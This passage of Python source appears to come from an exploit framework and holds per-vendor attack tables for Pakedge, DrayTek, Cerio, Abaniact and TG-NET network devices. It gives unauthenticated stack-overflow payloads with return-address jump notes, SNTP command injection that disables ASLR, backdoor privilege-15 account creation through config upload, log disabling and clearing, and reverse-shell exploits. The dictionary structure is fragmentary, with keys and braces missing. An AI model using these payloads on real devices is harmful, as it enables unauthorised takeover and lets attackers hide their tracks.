    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
    						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':True,	# My LAB workaround
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'Pakedge': { 
    				'vendor': 'Pakedgedevice & Software Inc',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
    						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {	# Not vulnerable 
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
    						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
    						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
    						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'DrayTek': { 
    				'vendor': 'DrayTek Corp.',
    				'info_leak': True,
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
    						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {	# Not vulnerable 
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
    						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
    						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
    						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'Cerio': { 
    				'vendor': 'CERIO Corp.',
    				'info_leak': False,
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content':'/mntlog/startup-config',			# /mntlog instead of /mnt to verify
    							'content_check':'/mntlog/startup-config',	# /mntlog instead of /mnt to verify
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
    						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
    						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
    						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
    						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'Abaniact': {
    				'vendor': 'Abaniact',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&login=1&_CMD_',
    						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
    						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround': True,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':True,	# My LAB workaround
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'TG-NET': {
    				'vendor': 'Shenzhen TG-NET Botone Technology Co,. Ltd.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
    							'content':'Firm Upgrade',
    							'content_check':'Firm Upgrade',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Reset device to factory default (PoC: Too dangerous to verify)',
    							'content':'Too dangerous to verify',
    							'vulnerable': True,
    							'safe': False
    							'authenticated': False,
    							'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
    							'vulnerable': True,
    							'safe': True
    						'change_mac_addr_set.cgi': {
    							'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,						# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',									# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',									# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
